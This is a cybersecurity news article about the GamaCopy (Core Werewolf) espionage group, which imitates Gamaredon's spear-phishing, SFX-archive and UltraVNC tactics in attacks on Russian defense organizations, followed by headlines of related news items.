GamaCopy mimics FSB-linked Gamaredon APT to launch attacks on Russia

GamaCopy mimics FSB-linked Gamaredon APT to launch attacks on Russia

A new cyber-espionage group, GamaCopy (aka Core Werewolf), has been using military-themed bait to launch attacks on Russian organizations, emulating the tactics of the notorious Russian hacking group Gamaredon. The campaign, which has been ongoing since June 2023, has targeted critical sectors in Russia, including defense and infrastructure, with the goal of stealing sensitive information.

GamaCopy has gained attention for its use of a “false flag” strategy, attempting to mislead cybersecurity teams by imitating the methods of Gamaredon, a Russian cyber-espionage group linked to the Federal Security Service (FSB).

Gamaredon has been known for targeting Ukrainian government agencies, non-governmental organizations, and the military since 2013. By tracing the origins of attack samples, security researchers have identified the connection between GamaCopy and Core Werewolf, which has launched several attacks against Russian entities.

The latest report on the group's activities comes from the Chinese cybersecurity firm Knownsec 404, which analyzed attack samples targeting Russian-speaking individuals. The firm found that these samples followed an identical attack methodology used by Gamaredon, leveraging military-related themes as bait.

The spear-phishing campaigns employed by GamaCopy utilize military-related lures to entice individuals in Russia's defense sector to download malicious files. The attacks involve a malicious 7z self-extracting (SFX) archive file, which, once executed, releases additional payloads designed to compromise the target's system. After infecting the victim's machine, the attackers use the open-source tool UltraVNC to maintain persistence and control over the compromised system.

However, the researchers note that GamaCopy differs slightly from Gamaredon in its technical aspect. While Gamaredon often uses VBS scripts to install UltraVNC and other payloads, GamaCopy's operations employ a different method, relying on a more streamlined attack chain and using port 443 rather than the commonly used port 5612.

The GamaCopy campaign appears to have been active since at least August 2021, although its more notable attacks began in mid-2023.


Back to the list

Latest Posts

Four key distributors of encrypted communications service Sky ECC arrested in Spain and Netherlands

Four key distributors of encrypted communications service Sky ECC arrested in Spain and Netherlands

The two men arrested in Spain are accused of overseeing the global distribution of Sky ECC devices and software.
12 February 2025
Sandworm APT targets Ukraine with trojanized Microsoft KMS activation tools

Sandworm APT targets Ukraine with trojanized Microsoft KMS activation tools

The attackers utilized a BACKORDER loader to deploy DarkCrystal RAT.
12 February 2025
North Korean Kimsuky adopted a new tactic to infiltrate targets

North Korean Kimsuky adopted a new tactic to infiltrate targets

The new tactic involves the threat actor tricking individuals into executing PowerShell commands as administrators.
12 February 2025